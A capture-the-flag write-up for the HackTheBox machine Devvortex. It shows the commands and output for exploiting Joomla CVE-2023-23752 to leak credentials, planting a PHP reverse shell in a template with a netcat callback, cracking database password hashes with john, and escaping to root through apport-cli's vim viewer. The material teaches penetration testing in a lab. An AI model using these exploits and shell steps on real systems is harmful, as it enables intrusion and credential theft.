HackTheBox Devvortex
Writeup for HackTheBox Devvortex
Machine Synopsis
Devvortex is an easy-difficulty Linux machine that features a Joomla CMS that is vulnerable to information disclosure. Accessing the service's configuration file reveals plaintext credentials that lead to Administrative access to the Joomla instance. With administrative access, the Joomla template is modified to include malicious PHP code and gain a shell. After gaining a shell and enumerating the database contents, hashed credentials are obtained, which are cracked and lead to SSH access to the machine. Post-exploitation enumeration reveals that the user is allowed to run apport-cli as root, which is leveraged to obtain a root shell. (Source)
Key exploitation techniques:
- Joomla Information Disclosure (CVE-2023-23752)
- Joomla Administrative Access via plaintext credentials
- Joomla Template Modification for RCE (webshell upload)
- Database credential extraction and hash cracking (bcrypt)
- SSH for initial user access
apport-cliPrivilege Escalation (CVE-2023-1326) viasudomisconfiguration
Enumeration
1
2
3
4
5
6
7
8
9
10
11
12
$ nmap -sC -sV 10.10.11.242
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://devvortex.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
The scan identified SSH and Nginx on port 80.
gobuster was used for directory and subdomain enumeration. No interesting directories were found, but a dev.devvortex.htb subdomain was discovered.
1
2
3
4
5
6
7
8
9
# Directory enumeration (no interesting results)
$ gobuster dir -u http://devvortex.htb -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-small.txt -t 50 -q
/images (Status: 301) [Size: 178] [--> http://devvortex.htb/images/]
/css (Status: 301) [Size: 178] [--> http://devvortex.htb/css/]
/js (Status: 301) [Size: 178] [--> http://devvortex.htb/js/]
# Subdomain enumeration
$ gobuster vhost -u http://devvortex.htb -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt --append-domain -q
Found: dev.devvortex.htb Status: 200 [Size: 23221]
The dev.devvortex.htb subdomain was added to /etc/hosts.
1
❯ echo -e '10.10.11.242\tdev.devvortex.htb' | sudo tee -a /etc/hosts
Browsing dev.devvortex.htb and then /robots.txt revealed common Joomla paths, including /administrator/.
1
2
3
4
5
# From http://dev.devvortex.htb/robots.txt
User-agent: *
Disallow: /administrator/
Disallow: /api/
...
Accessing /administrator/ presented a Joomla login page. The Joomla version was identified from /README.txt.
Joomla Information Disclosure (CVE-2023-23752)
Joomla version 4.x.x is vulnerable to CVE-2023-23752, an information disclosure vulnerability allowing unauthenticated access to sensitive configuration data via the API. This was exploited to retrieve user information and application configuration, including database credentials.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
# Retrieve user information
$ curl "http://dev.devvortex.htb/api/index.php/v1/users?public=true" | jq .
{
"links": { ... },
"data": [
{
"type": "users", "id": "649", "attributes": { "id": 649, "name": "lewis", "username": "lewis", "email": "lewis@devvortex.htb", "group_names": "Super Users" }
},
{
"type": "users", "id": "650", "attributes": { "id": 650, "name": "logan paul", "username": "logan", "email": "logan@devvortex.htb", "group_names": "Registered" }
}
],
"meta": { "total-pages": 1 }
}
# Retrieve application configuration
$ curl "http://dev.devvortex.htb/api/index.php/v1/config/application?public=true" | jq .
{
"links": { ... },
"data": [
...
{ "type": "application", "id": "224", "attributes": { "user": "lewis", "id": 224 } },
{ "type": "application", "id": "224", "attributes": { "password": "P4ntherg0t1n5r3c0n##", "id": 224 } },
{ "type": "application", "id": "224", "attributes": { "db": "joomla", "id": 224 } },
{ "type": "application", "id": "224", "attributes": { "dbprefix": "sd4fg_", "id": 224 } },
...
],
"meta": { "total-pages": 4 }
}
This disclosed two users (lewis, logan) and the database credentials lewis:P4ntherg0t1n5r3c0n##.
Exploitation
Joomla RCE (www-data) via Template Modification
The obtained credentials lewis:P4ntherg0t1n5r3c0n## were used to log into the Joomla administrator dashboard.
Within the dashboard, the “System” tab offered “Site Templates” management.
The atum template’s error.php file was selected for modification. A malicious PHP reverse shell payload was inserted into error.php and saved.
1
2
3
4
5
6
7
8
<?php
// PHP reverse shell payload
// Example:
// set_time_limit (0);
// $ip = '10.10.14.16';
// $port = 9999;
// ... (full payload)
?>
A netcat listener was started on the attacking machine. The error.php page was then accessed via curl, triggering the reverse shell.
1
2
3
4
5
6
7
8
9
10
11
12
13
# On attacker, set up Netcat listener
$ nc -nlvp 9999
listening on [any] 9999 ...
# Trigger webshell
$ curl "http://dev.devvortex.htb/administrator/templates/atum/error.php"
# Reverse shell received
connect to [10.10.14.16] from (UNKNOWN) [10.10.11.242] 57428
bash: cannot set terminal process group (853): Inappropriate ioctl for device
bash: no job control in this shell
www-data@devvortex:~/dev.devvortex.htb/administrator/templates/atum$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
This provided a shell as www-data.
Database Credential Extraction (logan)
With www-data access, the internal MySQL database was accessed using the previously found lewis credentials.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
www-data@devvortex:/home/logan$ mysql -h 127.0.0.1 -u lewis -p
Enter password: P4ntherg0t1n5r3c0n##
...
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| joomla |
| performance_schema |
+--------------------+
mysql> use joomla;
Database changed
mysql> show tables;
+-------------------------------+
| Tables_in_joomla |
+-------------------------------+
...
| sd4fg_user_keys |
| sd4fg_user_mfa |
| sd4fg_user_notes |
| sd4fg_user_profiles |
| sd4fg_user_usergroup_map |
| sd4fg_usergroups |
| sd4fg_users |
...
mysql> select username, password from sd4fg_users;
+----------+--------------------------------------------------------------+
| username | password |
+----------+--------------------------------------------------------------+
| lewis | $2y$10$6V52x.SD8Xc7hNlVwUTrI.ax4BIAYuhVBMVvnYWRceBmy8XdEzm1u |
| logan | $2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12 |
+----------+--------------------------------------------------------------+
The database contained password hashes for lewis and logan. The hash for logan ($2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12) was extracted and cracked using john.
1
2
3
4
5
❯ echo '$2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12' > logan_hash
❯ john logan_hash --wordlist=/usr/share/wordlists/rockyou.txt
...
tequieromucho (?)
Session completed.
The password for logan was tequieromucho. SSH access was gained using these credentials.
1
2
3
$ ssh logan@10.10.11.242
logan@10.10.11.242's password: tequieromucho
logan@devvortex:~$
Privilege Escalation
apport-cli Abuse (CVE-2023-1326)
sudo -l as logan revealed that apport-cli could be run as root without a password.
1
2
3
4
5
6
logan@devvortex:~$ sudo -l
Matching Defaults entries for logan on devvortex:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User logan may run the following commands on devvortex:
(ALL : ALL) /usr/bin/apport-cli
Checking apport-cli’s version (2.20.11) confirmed its vulnerability to CVE-2023-1326. This vulnerability allows arbitrary command execution when viewing a crash report in vim via apport-cli.
1
2
logan@devvortex:~$ sudo /usr/bin/apport-cli -v
2.20.11
To exploit this, apport-cli -f was used to generate a new report.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
logan@devvortex:~$ sudo /usr/bin/apport-cli -f
*** What kind of problem do you want to report?
...
Please choose (1/2/3/4/5/6/7/8/9/10/C): 1 # Choose any option, e.g., Display
...
*** What display problem do you observe?
...
Please choose (1/2/3/4/5/6/7/8/C): 2 # Choose any option, e.g., Freezes or hangs
...
Press any key to continue...
...
*** Send problem report to the developers?
...
Please choose (S/V/K/I/C): V # Choose View report
Selecting “V” (View report) opened the report in vim. Within vim, entering !/bin/bash (followed by Enter) escaped to a root shell.
1
2
3
4
# In vim viewer, type:
!/bin/bash
# Press Enter
root@devvortex:/home/logan#
This successfully granted a root shell.